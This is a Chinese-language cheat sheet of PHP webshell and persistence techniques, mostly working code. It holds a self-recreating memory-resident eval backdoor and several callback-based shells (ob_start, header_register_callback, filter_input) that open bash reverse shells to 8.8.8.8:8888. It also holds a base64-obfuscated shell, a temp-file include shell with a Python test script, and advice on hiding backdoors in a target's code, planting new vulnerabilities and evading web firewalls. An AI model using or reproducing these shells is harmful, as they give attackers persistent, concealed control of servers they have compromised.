一 . WebShell 驻留内存 , 轮询并自动创建

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    $file = 'c.php';
    $code = '<?php eval($_POST[c]);?>';
    while(true) {
        if(!file_exists($file)) {
            file_put_contents($file, $code);
        }
        usleep(50);
    }
?>

二 . 很隐蔽的 webshell

<?php
session_start();
extract($_GET);
if(preg_match('/[0-9]/',$_SESSION['PHPSESSID'])){exit;}
if(preg_match('/\/|\./',$_SESSION['PHPSESSID'])){exit;}
include(ini_get("session.save_path")."/sess_".$_SESSION['PHPSESSID']);
?>

三 . 使用回调函数

1. ob_start

# 自动触发
<?php function a($b){exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');}ob_start("a");?>

2. header_register_callback

# 自动触发
<?php function a() {exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');}header_register_callback('a');?>
<?php function a() {$_GET[c]($_GET[d]);}header_register_callback('a');?>

3. filter_input

# 需要 POST 一个 C 参数 , 就会触发反弹 shell
<?php function a($value){ exec('/bin/bash -c "bash -i >& /dev/tcp/8.8.8.8/8888 0>&1"');}filter_input(INPUT_POST, 'c', FILTER_CALLBACK, array('options' => 'a'));?>
# 直接菜刀连接 , 密码为 c
http://127.0.0.1/index.php?&c=assert&d=eval($_POST['c'])
<?php function a($c){$c($_GET['d']);}filter_input(INPUT_GET,'c', FILTER_CALLBACK,array('options'=>'a'));?>

4. 类似的函数还有 :

filter_var() - Filters a variable with a specified filter
filter_input_array() - Gets external variables and optionally filters them
filter_var_array() - Gets multiple variables and optionally filters them

5. stream_wrapper_register

<?php
class A{
    function __construct(){
        phpinfo();
        // $_GET[c]($_GET[d]);
    }
}
stream_wrapper_register("st", "A");
$fp = fopen("st://","r");
?>

6. 通过构造上述的webshell

其实发现了一些思路关于如何隐藏 WebShell
当我们已经得到一个已知的 webshell 以后
我认为最好的 webshell 就是将 webshell 隐藏在目标服务器的正常代码逻辑中
例如 :

1. 为某类添加魔术函数 (但是需要保证这个函数可以被我们触发)
2. 构造一个新的漏洞 , 别人比较难以发现 , 但是我们可以很容易就可以触发
3. 修改 php 配置文件 , 开启远程文件包含等比较危险的配置 (这样 webshell 并不需要保存在目标硬盘上 , 直接发送请求即可动态调用)
4. 挂上内存马
5. ... 待整理

<?php @base64_decode($_GET['a'])($_GET[b]);?>

障眼法 :

\r 为ASCII控制字符
如果一个文件中存在控制字符 \r
那么如果在终端中 cat 的时候就会控制光标移动到行首
例如 : 

image.png

image.png

文件包含法 :

通过包含上传的临时文件
服务器在处理上传文件的时序关系如下图 : 

image.png

webshell如下 :

<?php
include($_FILES["file"]["tmp_name"]);
?>

测试 :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

url = "http://127.0.0.1/index.php?c=system('id');"
files = {'file': ('filename.php', '<?php eval($_REQUEST[c]);?>', 'image/jpeg')}
response = requests.post(url, files=files)
content = response.content
print content

image.png

发一波过狗截图 :

image.png

image.png